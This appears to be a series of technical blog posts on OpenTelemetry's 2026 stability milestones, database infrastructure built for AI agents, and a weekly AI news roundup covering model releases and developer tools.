Adopt tail-based sampling with agent-aware criteria. Sample based on reasoning depth, tool retry count, and output confidence -- not just latency and error status. Keep 100% of traces where the agent exceeded its reasoning budget or produced low-confidence outputs.

Treat token cost as a first-class observability signal. A cost spike is often the earliest indicator of an agent behavior change. If your agent suddenly consumes 3x more tokens per session, something changed in its reasoning pattern, its tool responses, or its prompt. Surface this in your dashboards alongside latency and errors.

Deep Dive Resources

Red Hat: Distributed Tracing for Agentic Workflows with OpenTelemetry -- W3C context propagation across MCP servers, decorator-pattern instrumentation, hybrid auto+manual for agents. redhat.com
InfoQ: Discord's Envelope Pattern -- Elixir actor-model tracing, fanout-aware sampling at billion-message scale. infoq.com
Gravitee: AI Observability for MCP Tools -- Unified dashboards for agent traffic, LLM costs, and tool reliability. gravitee.io
Uptrace: OpenTelemetry gen_ai Semantic Conventions -- Auto-instrumentation for OpenAI, Anthropic, and LangChain with agent trace hierarchies. uptrace.dev
ClickHouse: Three Villains of Observability -- Retention, sampling, and rollup anti-patterns with cost analysis for full-fidelity storage. clickhouse.com
Grafana: Observability Survey 2026 -- 92% find AI valuable for anomaly detection, 14% observe LLM workloads. grafana.com
Conf42 SRE: Signal-to-Context Framework -- SLO-focused golden signals and agentic auto-remediation strategies. conf42.com

Sources

Red Hat, "Distributed Tracing for Agentic Workflows with OpenTelemetry," April 6, 2026
InfoQ / Discord Engineering, "The Envelope Pattern: Distributed Tracing in Elixir at Scale," March 28, 2026
Gravitee, "AI Observability: Monitoring MCP Tools and Agent Traffic," April 10, 2026
Uptrace, "OpenTelemetry for LLMs and AI Agents," 2026
ClickHouse, "The Three Villains of Observability Data," April 8, 2026
Grafana Labs, "State of Observability 2026 Survey," 2026
Conf42 SRE, "Signal-to-Context: Observability for Agentic Systems," 2026

OpenTelemetry's Stability Sprint: The Week Nobody Noticed

Anil Kurmi — Sun, 12 Apr 2026 01:49:33 +0000

Wednesday morning at KubeCon EU in Amsterdam. Hall 7. The OpenTelemetry maintainers' meeting had maybe 200 people in a room built for 600. Three halls over, every AI agent demo was standing room only.

In that half-empty room, the OTel project announced more stability milestones in a single week than in the previous two years combined.

Declarative Configuration: stable. Profiles: alpha. eBPF Instrumentation: headed to RC. Go Metrics SDK: 30x faster. Baggage propagation validated at 60 million requests per minute.

And the hallway track? All anyone wanted to talk about was whether Claude could auto-instrument their microservices.

Here's the thing. OpenTelemetry has been "almost ready" for production for years. Teams adopt it, hit rough edges in configuration drift and SDK inconsistencies, fall back to Datadog or Dynatrace vendor SDKs, and file a mental note to try again in six months. This week might be the tipping point. But only if you know which parts actually crossed the line.

5-Minute Skim

If you're skimming between sessions:

Declarative Configuration hit stable. One YAML schema configures SDK + instrumentation across C++, Go, Java, JavaScript, and PHP. .NET and Python are weeks away. This kills the "every language configures differently" problem that plagued adoption.
Profiles entered alpha as the 4th observability pillar. Continuous profiling with 40% smaller wire format than pprof, cross-signal correlation via trace_id/span_id, and an eBPF agent that runs as a Collector receiver.
eBPF Instrumentation (OBI) is heading to RC. Zero-code, kernel-level tracing for Go, Rust, and C++ -- languages that never had auto-instrumentation before. No sidecars. No code changes. No runtime overhead from bytecode manipulation.
Go Metrics SDK got 30x faster. The synchronous instrument path was the bottleneck everyone complained about. Fixed.
65% of organizations now invest in both Prometheus and OTel. Not either/or. Both. 47% increased OTel usage year-over-year. 84% report time or cost savings from open standards adoption.
92% find AI valuable for anomaly detection on telemetry data. The observability-meets-AI convergence is real, and OTel's structured, vendor-neutral data is what makes it possible.

Now let me walk through what actually changed and why it matters.

Why Has OTel Been "Almost Ready" for Five Years?

Because a spec isn't a product.

OpenTelemetry reached traces GA in 2021. Metrics in 2023. Logs in 2024. Each time, the announcement said "production ready." Each time, platform teams discovered the gap between a stable signal spec and a deployable system.

The spec says traces are stable. Great. But how do you configure the SDK? Environment variables? Code? YAML? It depends on the language. The Go SDK configures differently from Java which configures differently from Python. You need different expertise for each runtime in your fleet. That's not production-ready. That's a research project.

The spec says metrics are stable. But the Go SDK's synchronous instruments had performance characteristics that made high-throughput services drop samples or add latency. Teams benchmarked, saw the numbers, and switched back to Prometheus client libraries.

The spec says logs are stable. But without profiling data, you still can't answer "this endpoint is slow -- is it the code, the GC, or the downstream dependency?" You had three pillars holding up a roof that needed four.

This week fixed all three problems simultaneously. That's what makes it different.

What Does the 4-Signal Architecture Actually Look Like?

Before this week, OTel had three stable signals. Now it has three stable signals and a fourth entering alpha. The architecture looks like this:

The critical change isn't the fourth signal. It's the box in the middle.

Declarative Configuration means that single YAML file controls everything: which signals are enabled, which exporters they route to, which sampling rules apply, which resources are attached. Across five languages today, seven soon. One schema. One file. One truth.

Before this, every language SDK had its own configuration story. Java used system properties and environment variables. Go used functional options in code. JavaScript used a mix of environment variables and programmatic setup. Python had its own thing entirely. If you ran a polyglot microservices fleet -- and who doesn't -- you needed language-specific expertise for every runtime.

That's over.

That file replaces dozens of environment variables, language-specific initialization code, and vendor-specific configuration blocks. Deploy it via ConfigMap in Kubernetes, mount it into every pod, and every SDK reads the same truth.

The stability guarantee means the schema won't break between minor versions. You can upgrade the SDK without rewriting your configuration. For platform teams managing hundreds of services, that's the difference between "we can standardize on OTel" and "we'll revisit next quarter."

.NET and Python support is underway and expected within weeks. When those land, Declarative Configuration covers every major backend language in production use.

Why Do Profiles Change Everything?

Traces tell you which service is slow. Metrics tell you how slow. Logs tell you what happened. None of them tell you why.

Why is checkout-service P99 at 800ms? Is it a hot code path? GC pressure? Lock contention? A downstream timeout? With three signals, you're guessing. You jump to a profiler, set up a separate agent, try to correlate timestamps manually, lose the thread, give up, add more logging, deploy, wait for the next incident.

Profiles fix this. They're continuous profiling -- CPU, memory allocation, wall-clock, lock contention -- baked into the same pipeline as your traces, metrics, and logs.

The key design decision: profiles carry trace_id and span_id. That means you can go from a slow trace span directly to the flame graph showing exactly which function burned 600ms. No timestamp correlation. No separate tooling. One click.

The wire format is 40% smaller than pprof, which matters when you're shipping continuous profiling data from every pod in your fleet. And the eBPF-based profiling agent runs as a Collector receiver -- not a separate daemon, not a sidecar, but a component inside the Collector you already run.

Alpha means the spec will change. APIs are not frozen. But the signal definition, wire format, and Collector integration path are real enough to evaluate today.

How Does eBPF Instrumentation Work Without Code Changes?

This one matters most for the languages OTel has historically ignored.

Java has auto-instrumentation via bytecode manipulation. Python has monkey-patching. JavaScript has require hooks. But Go? Rust? C++? These compile to native binaries. There's no bytecode to manipulate. No interpreter to hook. You either instrument the code manually or you don't instrument it at all.

eBPF Instrumentation -- OBI -- solves this at the kernel level.

eBPF programs attach to function entry and exit points (uprobes) in the compiled binary. They capture timing, arguments, and return values without modifying the binary, without injecting a sidecar, and without adding runtime overhead from bytecode manipulation. The traces flow into the OTel Collector through a dedicated receiver.

This is beta today, heading to RC. Splunk showed it running in production at KubeCon with their GA Kubernetes Operator managing the lifecycle.

The trade-off is real: eBPF requires Linux kernel 5.8+ and appropriate capabilities (CAP_BPF). It can't instrument inlined functions. And the span detail is coarser than manual instrumentation -- you get function-level granularity, not arbitrary code block spans. For most observability use cases, that's more than enough. For custom business logic spans, you'll still need manual instrumentation at key points.

Vendor SDK vs. OTel: Where's the Trade-off Now?

This is the question I hear most from platform engineering leads. "Should we migrate off Datadog/Dynatrace/New Relic SDKs onto OTel?"

A year ago, the honest answer was "probably not yet." The configuration story was fragmented. Performance had gaps. Profiling didn't exist. Vendor SDKs gave you a coherent, well-tested, fully-supported package. OTel gave you portability at the cost of paper cuts.

After this week, the calculus shifts.

What OTel gives you now:

Single configuration schema across all languages (Declarative Config, stable)
Four signals in one pipeline (traces, metrics, logs, profiles)
Zero-code instrumentation for compiled languages (eBPF)
Vendor portability: switch backends without re-instrumenting
30x faster Go metrics (the worst performance gap is closed)

What vendor SDKs still give you:

Tighter integration with vendor-specific features (AI-powered root cause, custom dashboards, proprietary correlation)
One vendor to call when something breaks
Battle-tested at extreme scale with years of production hardening
Faster time-to-value for small teams without platform engineering capacity

The hybrid pattern that's emerging: Instrument with OTel SDKs and Declarative Config. Export to your vendor of choice via OTLP. Use vendor-specific features on the backend. This gives you portability at the instrumentation layer and vendor power at the analysis layer.

65% of organizations are already doing exactly this -- investing in both open standards and commercial platforms simultaneously. That number is from Grafana's 2026 Open Standards survey, and it matches every conversation I've had this quarter.
The Collector as a routing layer is the unlock. Instrument once. Route anywhere. Change vendors without touching application code. That's the promise OTel has been making for five years. This week, the last major blockers to delivering on it fell away.

What Does the Adoption Data Actually Say?

Grafana surveyed thousands of practitioners in early 2026. The numbers tell a clear story:

57% use OTel for metrics. This was the lagging signal. Prometheus had an iron grip. OTel metrics crossing the majority threshold means the "just use Prometheus" default is eroding.
50% use OTel for traces. Traces were the first stable signal, and half the industry is on board. The other half is split between vendor SDKs and "we don't do distributed tracing yet."
48% use OTel for logs. Surprisingly close to traces, given that OTel logs only went stable in 2024. The structured logging push is working.
47% increased OTel usage year-over-year. Not just adoption, but deepening adoption. Teams that started with traces are adding metrics and logs.
84% report time or cost savings. This is the number that gets budget. Not "it's the right thing to do" but "it saves money."

The Baggage signal at 60 million requests per minute is less about the feature and more about the proof point. OTel's core propagation infrastructure handles hyperscale traffic. The "will it perform?" question has an answer now.

Mono-Signal vs. Multi-Signal: Which Migration Path?

If you're planning an OTel migration, you have two strategies. Both work. They have different risk profiles.

Mono-signal migration: Pick one signal -- usually traces -- and migrate it fully across your fleet. Get the Collector running, the exporters configured, the dashboards rebuilt. Stabilize. Then add metrics. Then logs. Then profiles.

This is lower risk. You learn the operational model on one signal before adding complexity. The downside: you're running two parallel telemetry pipelines for months. Vendor SDK for the signals you haven't migrated. OTel for the one you have. That's more infrastructure, more cost, more cognitive load.

Multi-signal migration: Use Declarative Configuration to deploy all signals at once. One YAML, one Collector, one rollout.

This is higher risk but dramatically faster. Declarative Config makes it feasible because you're not writing language-specific initialization code for each signal in each language. You write the YAML once. The downside: if something breaks, everything breaks. Your blast radius is your entire observability pipeline.

My recommendation for most teams: start with traces (the most mature signal), add metrics within the same quarter, add logs in the next quarter, and evaluate profiles once they hit beta. Use Declarative Config from day one even if you're only enabling one signal -- the migration cost of adding signals later drops to near zero.

What Should You Do This Quarter?

Adopt Declarative Configuration immediately. Even if you're already running OTel, switch to the stable YAML schema. It eliminates environment variable sprawl, makes configuration auditable and version-controlled, and prepares you for adding signals with zero SDK code changes. If you're on C++, Go, Java, JavaScript, or PHP, it's available today.

Evaluate Profiles on a single high-value service. Pick the service that generates the most on-call pages. Deploy the eBPF profiling agent as a Collector receiver. Correlate profile data with existing traces. You'll find root causes you've been chasing for months. Alpha means "the API may change," not "it doesn't work."

Benchmark eBPF Instrumentation against your manual instrumentation. If you have Go, Rust, or C++ services with no observability or hand-rolled tracing, OBI in beta is ready for staging environments. Compare the span coverage against what you'd get from manual instrumentation. For most services, the 80/20 is heavily in eBPF's favor.

Stop waiting for OTel to be "ready." Traces have been stable for five years. Metrics for three. Logs for two. Configuration is now stable. The Go performance gap is closed. The "we'll adopt OTel when it's mature" position was defensible in 2024. In 2026, it's just inertia.

Budget for the Collector as infrastructure. The Collector isn't a nice-to-have sidecar. It's a critical routing layer between your applications and your observability backends. Run it as a DaemonSet. Give it resource limits. Monitor it with... itself. Treat it like you treat your service mesh control plane.

Deep Dive Resources

OTel Blog: Declarative Configuration Stable — Schema spec, language support matrix, migration guide — opentelemetry.io/blog/2026/declarative-configuration-stable
OTel Blog: Profiles Signal Alpha — 4th pillar design, wire format, cross-signal correlation — opentelemetry.io/blog/2026/profiles-alpha
Bindplane: KubeCon EU 2026 OTel Recap — All milestones in one summary, Go SDK benchmarks — bindplane.com/blog/kubecon-eu-2026-otel-recap
Splunk: KubeCon EU 2026 — eBPF Instrumentation beta, GA Kubernetes Operator — splunk.com/blog/kubecon-eu-2026
Grafana: 2026 Open Standards in Observability Survey — 65% dual investment, 84% cost savings, adoption metrics — grafana.com/reports/open-standards-2026
Grafana: 2026 AI in Observability Survey — 92% find AI valuable, GenAI adoption metrics — grafana.com/reports/ai-observability-2026
OpenTelemetry Declarative Config Schema — The actual YAML schema reference — github.com/open-telemetry/opentelemetry-configuration
OTel eBPF Instrumentation (OBI) — Zero-code kernel-level tracing project — github.com/open-telemetry/opentelemetry-ebpf-instrumentation

Sources

Bindplane, "KubeCon EU 2026 OpenTelemetry Recap," April 2, 2026
OpenTelemetry Blog, "Profiles Signal Enters Alpha," April 2026
OpenTelemetry Blog, "Declarative Configuration Reaches Stable," April 2026
Splunk, "KubeCon EU 2026: OTel eBPF Instrumentation and Kubernetes Operator GA," April 2026
Grafana Labs, "2026 Open Standards in Observability Survey," March 2026
Grafana Labs, "2026 State of AI in Observability," March 2026

Agent Native Data Infrastructure

Anil Kurmi — Sun, 12 Apr 2026 01:47:20 +0000

The Database Didn't Change. The User Did.

At Databricks, agents now create 80% of new databases.

Not schemas. Not tables. Entire databases. Some agent-driven projects have reached 500+ nested branch depths—a topology that no human would create, manage, or even conceptually organize. At PingCAP, over 90% of new TiDB Cloud clusters are provisioned by agents. The primary consumer of database infrastructure is no longer a person.

And here's what nobody wants to admit: every optimization we've built into databases for the last 40 years assumed a human was asking the questions.

Humans have intuition. They know that a sampled trace is "probably fine" because they recognize the pattern from last quarter. They get tired at 2 AM and stop branching their investigation. They read an error message, sigh, and open a runbook they've used before.

Agents do none of this.

An agent won't stop branching after 10 experiments. It'll branch 500 times. It won't accept sampled data as "good enough"—it can't compensate for the missing 1% with gut feeling. It won't tolerate a 20-second query response in a reasoning loop that needs sub-second feedback. And it will absolutely not read your helpful error message and "figure it out."

This week, I tracked six independent announcements from Databricks, CockroachDB, ClickHouse, Confluent, RisingWave, and PingCAP. None of them coordinated. All of them arrived at the same conclusion: the database stack must be redesigned for a non-human consumer. What emerged are six design principles that define agent-native data infrastructure.

5-Minute Skim

If you are short on time, here is the entire argument in six bullets:

Copy-on-write everything. Agents need cheap isolation, not expensive duplication. Databricks Lakebase creates database branches in milliseconds via O(1) metadata copy-on-write. Agents create ~4x more databases than humans.
SQL as the universal agent interface. LLMs generate SQL fluently. PostgreSQL wire protocol is becoming the lingua franca. CockroachDB, ClickHouse, RisingWave, and Confluent Flink all converge on SQL as the agent-facing surface.
Full-fidelity as default. Sampling, rollups, and short retention windows are human compromises that become agent poison. ClickHouse's object storage economics ($0.0005/GB/month effective) make 30-365 day full-fidelity retention the baseline.
Scale-to-zero economics. Agents create ephemeral workloads. Billing must match. Lakebase, TiDB, and ClickHouse all offer scale-to-zero or request-unit pricing.
MCP as control plane. CockroachDB ships a managed MCP server. Confluent integrates MCP-based tool calling into Flink. ClickHouse exposes an MCP server for constrained SQL. MCP is becoming the de facto agent-to-infrastructure protocol.
Agent Experience (AX) as design discipline. ClickHouse's CLI ships "CONTEXT FOR AGENTS" sections in help text. CockroachDB's ccloud CLI is agent-ready. Tools must now be designed for two audiences simultaneously.

What Does "Agent-Native" Actually Mean?

I want to be precise about this term because it's already getting diluted by marketing.

Agent-native doesn't mean "we added an API." It means the infrastructure was designed—or redesigned—around the assumption that autonomous software agents are the primary consumer. The distinction matters because it changes everything: branching models, retention policies, billing granularity, error surfaces, even help text.

Here's the architecture model. Six principles, each addressing a specific failure mode when agents hit traditional infrastructure:

Each of these principles emerged independently from different companies solving different problems. That's what makes this interesting. Nobody designed this framework. It crystallized.

Why Do Agents Need Git-for-Databases?

PingCAP published a scale model that reframes how we should think about database provisioning: 10 million databases = 100,000 users x 10 agent tasks x 10 experimental branches.

That number isn't theoretical. Manus 1.5 goes from prompt to code to deploy to database in minutes. Each agent task might spin up multiple experimental branches, test hypotheses against isolated copies of state, and discard 90% of them. The database isn't a place you carefully design and migrate. It's a scratchpad.

Traditional database cloning can't handle this. A full clone takes minutes to hours, costs real storage, and requires cleanup. Databricks Lakebase solves this with O(1) metadata copy-on-write branching—the same principle behind Git, but applied to PostgreSQL 17 storage.

New branches inherit schema and data from the parent but share underlying storage via pointers. Only when an agent actually mutates data does the system write new pages. Branch creation takes milliseconds. 97% of dev/test copies use this mechanism.

The insight: agents don't need full database clones. They need isolated views of state with lazy materialization. That's a fundamentally different storage primitive than anything we've built for human consumers.

Lakebase supports up to 8TB per instance, scale-to-zero timeout with usage-based billing, and pgvector for AI-driven vector search. Data written via Postgres is immediately queryable by Spark and Databricks SQL—no ETL pipeline required.

The trade-off is real. You're tightly coupled to the Databricks platform to get the lakehouse integration benefit. AWS is GA, Azure is preview, GCP comes later in 2026. And readable secondaries are only available in the provisioned tier, not autoscaling.

But the directional bet is clear: agents treat database state the way developers treat code branches.

Why Does Multi-Region SQL Matter for Agents?

Here's a failure mode nobody talks about: an AI SRE agent investigating an incident in us-east fires a diagnostic query that silently escalates to a cross-region join against eu-west. The query technically succeeds. But the latency spike it introduced just made the incident worse.

CockroachDB filed three patents to prevent exactly this.

The core innovation is locality-aware query planning. Traditional cost models account for CPU, I/O, cardinality, and network. They don't weight WAN latency as a first-class cost factor. CockroachDB's new optimizer generates multiple candidate plans with inter-region latency as an explicit dimension.

The killer feature for agents is enforce_home_region. It's a session-level setting that creates a hard boundary: queries either complete locally or error immediately. No silent cross-region escalation. No "technically correct but operationally surprising" behavior.

This matters because agents don't notice when a query takes 200ms instead of 2ms. They don't have the human instinct to say "that felt slow, something's wrong." Without explicit enforcement, agents will silently degrade cross-region performance in ways that compound unpredictably.

CockroachDB also shipped a managed MCP server and an agent-ready ccloud CLI in March 2026. This isn't a bolt-on. It's production database operations exposed to AI agents with enterprise security out of the box.

Why Are Sampling and Rollups Poison for Agents?

ClickHouse published a piece this week that names what I've been feeling for months. They call retention limits, sampling, and rollups "the three villains of agentic observability." I think the framing is exactly right.

These aren't bad engineering decisions. They're architectural constraints masquerading as best practices. They emerged from storage cost limitations, not from what operators actually needed. For humans with institutional memory, they're acceptable compromises. For agents, they're active sabotage.

Retention. Organizations enforce 7-14 day log retention because SSD-backed storage is expensive. An AI SRE investigating a checkout failure today can't see the same failure pattern from six weeks ago. Seasonal patterns, rare edge cases, long-tail incidents—all invisible. The agent has no institutional memory to compensate.

Sampling. Head-based sampling decides at ingestion time which traces to keep. Tail-based sampling waits for trace completion. Both permanently discard data. An agent trying to correlate error patterns with deployment events can't do it if the connecting traces were sampled away. The data loss is irreversible and invisible to the agent.

Rollups. Time-series systems pre-aggregate metrics to handle high-cardinality labels. But pre-aggregation requires predicting future queries. If you aggregated away userId, you can never retroactively break down by customer. For a human analyst, that's an inconvenience. For an agent trying to reason about causality, it's a dead end.

ClickHouse's counter-argument is economic. Object storage at ~$0.025/GB with 50x columnar compression yields an effective cost of ~$0.0005/GB/month. At that price, 30-365 day full-fidelity retention becomes the default, not the luxury.

Their AI SRE reference architecture measures 6-27 database queries per investigation. At 20-30 seconds per query on legacy systems, the AI workflow is actually slower than a human. ClickHouse delivers sub-second responses. Character.AI reported that queries against the last 10 minutes dropped from 1-2 minutes to instant after switching.

The architecture is clean: observability data in MergeTree tables, context tables for deployments and topology, an MCP server providing constrained SQL access, and copilot logic for iterative SQL generation grounded in deployment and historical context.

How Do Streaming Pipelines Become Agent-Aware?

Confluent announced Streaming Agents this quarter—event-driven AI agents built natively on Apache Flink within Confluent Cloud. This is not "connect your agent to Kafka." This is agents embedded directly inside data pipelines for real-time reasoning.

Every input is logged immutably. Every decision is replayable. This solves three problems simultaneously: failure recovery, logic testing, and decision auditing.

The technical surface is rich. Native model inference against remote LLM endpoints in Flink SQL queries. Continuous vector generation for RAG. Tool calling via MCP. Built-in anomaly detection and Auto-ARIMA forecasting directly on time-series streams. Stream governance with lineage tracking and schema enforcement.

But the architectural move I find most interesting is the A2A protocol integration. Agent-to-Agent is an open protocol now wired directly into Flink. Streaming Agents can connect, orchestrate, and collaborate with agents on any A2A-capable platform—LangChain, SAP, Salesforce. Communication happens over replayable Kafka event streams.

The multi-agent orchestrator pattern uses Kafka as short-term shared memory and Flink for real-time routing. Agents are essentially stateful microservices with a brain. No hard-coded dependencies between them.

Confluent also shipped KIP-932 share groups (the same feature I wrote about last week in the context of queue semantics). For agent workloads, this is critical. Agents produce bursty, parallel work. The old 1:1 partition-to-consumer constraint was designed for predictable human-scale throughput. Share groups shatter that limitation with elastic many-to-many consumption.

On the streaming database side, RisingWave's economics tell a compelling story. State storage on S3 costs ~$23/month per TB. The same state on EBS-backed systems runs $100-300/month per TB. For agents that spin up materialized views as ephemeral feature stores, that 5-10x cost difference determines whether the architecture is viable.

What Does Agent Experience (AX) Look Like in Practice?

This is the principle that surprised me most. ClickHouse's Alasdair Brown wrote a post about building clickhousectl—their CLI—and the core argument is that Agent Experience mirrors Developer Experience. LLMs are the new primary users of your CLI.

Four design decisions stood out:

Self-discovery through convention. Comprehensive --help output specifically targeting agent comprehension. Not terse Unix-style help. Detailed, workflow-oriented help.

Agent-specific context. Each command includes a "CONTEXT FOR AGENTS" section with workflow guidance. For example: "Typical local workflow: chv install stable && chv use stable && chv run server." The agent doesn't need to explore or experiment. The happy path is documented explicitly.

Predictability over cleverness. Boring, conventional patterns. Unexpected behavior wastes tokens in recovery loops. Every surprising edge case is a wasted API call.

Guidance reduces exploration. Encode common workflows upfront. Every exploratory API call an agent makes is a cost and a latency penalty. Good AX eliminates the need to explore.

Brown validated this by deploying a full Google Analytics competitor using only voice commands via OpenClaw on mobile. The agent autonomously installed ClickHouse, bootstrapped a Next.js app, created schemas, populated test data, built dashboards, and deployed to ClickHouse Cloud.

ClickHouse also shipped 28 packaged Agent Skills—schema design, query optimization, data ingestion, partitioning strategies—installable via npx skills add clickhouse/agent-skills. Auto-detects Claude Code, Cursor, and Copilot.

The unresolved problem: authentication, user management, and billing remain deeply human-oriented workflows. Nobody has a good answer for how agents should handle these. This is where MCP-as-control-plane needs to evolve next.

Where Does This Fall Apart?

I want to be honest about the tensions because this space is moving fast and the marketing is moving faster.

Isolation versus cost. Copy-on-write branching is elegant but adds metadata complexity. At 500+ branch depths, garbage collection of abandoned branches becomes its own operational problem. Lakebase is young. We don't yet know where the metadata overhead hits a wall.

Full-fidelity versus budget. $0.0005/GB/month sounds cheap until you're ingesting petabytes. At 1 PB of observability data, that's still $500/month just for storage—reasonable, but the query compute against unsampled petabyte-scale data is the real cost. ClickHouse's columnar architecture handles this well, but you need to size your compute pools correctly.

Agent autonomy versus governance. PingCAP's 10-million-database model raises an obvious question: who pays? Per-agent governance with statement-level metering and budget controls is essential, but the tooling is immature. A runaway agent loop creating databases at scale-to-zero pricing could still generate a surprising bill.

SQL universality versus performance. SQL is the agent-friendliest interface, but not every workload fits SQL semantics cleanly. Graph traversals, time-series downsampling, and geospatial queries all have specialized languages that outperform SQL. The risk is that "SQL everywhere" becomes a performance ceiling for agents that need specialized operations.

Streaming agents versus debuggability. Embedding LLM reasoning inside Flink pipelines sounds powerful until you need to debug why Agent #47 in your multi-agent orchestrator made a bad routing decision at 3:47 AM. Kafka's immutable log helps with replay, but reasoning traces inside streaming pipelines are a new observability challenge that nobody has fully solved.

What Should You Do With This?

If your infrastructure team is starting a new project this quarter, here are the concrete moves:

Evaluate copy-on-write branching for any agent-driven workflow. If your agents create test environments, run experiments, or need isolated state, traditional database cloning is an anti-pattern. Lakebase, Neon's branching, or PlanetScale's branching should be on your shortlist.

Audit your observability retention and sampling. If you're enforcing 7-day retention and head-based sampling, you've built an infrastructure that agents cannot effectively use. Run the cost model on ClickHouse-style object storage. You might find that 90-day full-fidelity costs less than you think.

Ship an MCP server for your internal data services. CockroachDB, ClickHouse, and Confluent all converged on MCP as the agent access layer. If you have internal services that agents need to query, an MCP server with constrained access is the pattern to adopt now.

Add "CONTEXT FOR AGENTS" to your CLIs and internal tools. This is the cheapest, highest-leverage change on this list. Your internal tooling was built for humans. Adding agent-oriented documentation to help text, error messages, and README files costs almost nothing and dramatically reduces agent exploration waste.

Model your billing for agent-scale workloads. Run the math on 100x your current database creation rate. If the number is terrifying, you need scale-to-zero or request-unit billing before agents hit production.

Deep Dive Resources

Resource	Why It Matters
Databricks: Agentic Development Will Change Databases	Origin story for O(1) database branching
ClickHouse: Three Villains of Agentic Observability	The definitive case against sampling for agents
ClickHouse: AI SRE Architecture	Reference architecture with query-count benchmarks
Alasdair Brown: Agent Experience — Building a CLI	Practical AX design principles
CockroachDB: Multi-Region SQL Patents	Locality-aware query planning deep dive
Confluent: Introducing Streaming Agents	Event-driven AI agents on Flink
Confluent: Multi-Agent Orchestrator	Kafka as shared memory for agent swarms
PingCAP: Agentic AI Database Trends 2026	10-million-database scale model
RisingWave: Streaming Database Landscape 2026	State storage cost comparison
Cloud Security Alliance: Cybersecurity Needs a New Data Architecture	Federated satellite model for agent-specialized access

Sources

Databricks Blog — "How Agentic Software Development Will Change Databases" (2026)
Databricks Blog — "Database Branching in Postgres with Lakebase" (2026)
InfoQ — "Databricks Introduces Lakebase" (Feb 2026)
CockroachDB Blog — "Multi-Region Database Architecture & SQL Placement Locality" (2026)
ClickHouse Blog — "Three Villains of Agentic Observability" (Apr 2026)
ClickHouse Blog — "AI SRE Observability Architecture" (2026)
ClickHouse Blog — "Introducing Agent Skills" (2026)
Alasdair Brown — "Agent Experience: Building a CLI for ClickHouse" (2026)
RisingWave Blog — "Streaming Database Landscape 2026 Complete Guide" (2026)
RisingWave Blog — "CDC Stream Processing Complete Guide" (2026)
Confluent Blog — "Q1 2026 Cloud Launch" (2026)
Confluent Blog — "Introducing Streaming Agents" (2026)
Confluent Blog — "Multi-Agent Orchestrator Using Flink and Kafka" (2026)
Cloud Security Alliance — "Cybersecurity Needs a New Data Architecture" (Apr 2026)
PingCAP Blog — "Agentic AI Database Trends That Will Define 2026" (2026)

AI Weekly: 12 Big AI Stories this week

Anil Kurmi — Sat, 11 Apr 2026 07:57:16 +0000

(2-minute summary)

The biggest story: Anthropic says it built a model, Claude Mythos, that is so effective at finding zero-day vulnerabilities that it will not release it publicly. Instead, it gave access to about 12 defense partners under Project Glasswing, along with $100M in credits. In testing, it reportedly found a 27-year-old OpenBSD kernel bug and generated 181 working Firefox exploits, compared with just 2 for Opus 4.6.
The most interesting twist: OpenAI released its first open-weight models under Apache 2.0, while Meta, the company that spent years making the case for open AI, shipped its first proprietary flagship model with Muse Spark. For one week at least, the two companies looked like they had traded philosophies.
What developers should watch: Anthropic cut off third-party tool access to Claude subscriptions for tools like Cursor, Cline, and OpenClaw, pushing users toward API billing and, in some cases, dramatically higher costs. At the same time, Cursor 3 leaned harder into agent-first workflows, and the market is now comfortable claiming AI writes 41% of all code.

This Week in AI — Category Breakdown

1. Model Releases & Benchmarks

Meta Muse Spark (Meta, April 8): Meta introduced Muse Spark, the first major model from Meta Superintelligence Labs under Alexandr Wang. It is a proprietary multimodal reasoning model with a "Contemplating Mode" that runs parallel multi-agent analysis. Early numbers are strong: 0.9 on GPQA Diamond and 77.4% on SWE-bench Verified. The Meta AI app also jumped from #57 to #5 on the App Store in 24 hours. Source: CNBC
Anthropic Claude Mythos Preview (Anthropic, April 7): Anthropic says Mythos scored 99 on the BenchLM composite, versus 92 for Opus 4.6, and a perfect 100 in coding and agentic categories. It still will not be released publicly because of its cybersecurity capabilities. Access is limited to roughly 12 partners under Project Glasswing. Source: Fortune
Zhipu AI GLM-5.1 (Z.ai, April 7): GLM-5.1 is MIT-licensed, built as a 754B MoE model with 40B active parameters, and tops SWE-bench Pro at 58.4%, slightly ahead of GPT-5.4 at 57.7%. The part that matters strategically is that it was trained entirely on Huawei Ascend chips, with no NVIDIA dependency. Pricing is also aggressive at $3/month compared with $100-200 for frontier proprietary models. Source: BuildFastWithAI
The leaderboard is now extremely tight: BenchLM has Gemini 3.1 Pro and GPT-5.4 tied at 94, while Claude Opus 4.6 and GPT-5.4 Pro sit at 92. Claude Opus 4.6 still leads SWE-bench Verified for coding at 80.8%, and GPT-5.4 Pro still leads reasoning at 99.3.

2. Agentic AI & Agent Frameworks

Microsoft Agent Framework 1.0 (Microsoft, April 7): Microsoft shipped a production-ready 1.0 release that pulls Semantic Kernel and AutoGen into one open-source SDK for .NET and Python. It includes full MCP support, five orchestration patterns, and a browser-based DevUI debugger. Source: Microsoft DevBlogs
Anthropic Claude Managed Agents (Anthropic, April 8): Anthropic launched a managed cloud platform where you define the agent spec and Anthropic runs the rest. That includes sandboxed container execution, SSE streaming, and seven SDKs. Early customers include Notion, Rakuten, and Asana. Source: Anthropic Docs
Anthropic "Conway" Platform (leaked, in testing): The leaked picture here is interesting. Conway appears to be a persistent, event-driven agent platform where webhooks can wake agent instances without human intervention. A Claude Code source leak exposed 44 hidden feature flags. Estimated timing is Q2-Q3 2026. Source: Dataconomy
MCP v2.1 hits 97M monthly downloads: MCP is not niche anymore. Version 2.1 adds Server Cards for auto-discovery, the ecosystem now claims 10,000+ public MCP servers, and governance sits with the Linux Foundation's Agentic AI Foundation. Source: modelcontextprotocol.io
Microsoft Agent Governance Toolkit: Microsoft also open-sourced a seven-package governance system that works across LangChain, CrewAI, Google ADK, and the OpenAI Agents SDK. The notable pieces are Ed25519-based agent identity and sub-millisecond policy enforcement. Source: Help Net Security

3. AI Coding & Developer Tools

Anthropic blocks third-party tool access (April 4): This was probably the most immediate story for working developers. Claude Pro and Max subscriptions no longer work with Cursor, Cline, OpenClaw, or Windsurf. Users now have to switch to pay-as-you-go API billing, which some say increases their costs by as much as 50x. Anthropic cited a cache-efficiency mismatch. Source: VentureBeat
Cursor 3 launches an agent-first workspace (April 2): Cursor replaced Composer with a full-screen Agents Window and now supports essentially unlimited parallel agents across local, cloud, and SSH environments. The new /best-of-n feature runs the same task across multiple models. Cursor says it is at $2B ARR. Source: cursor.com
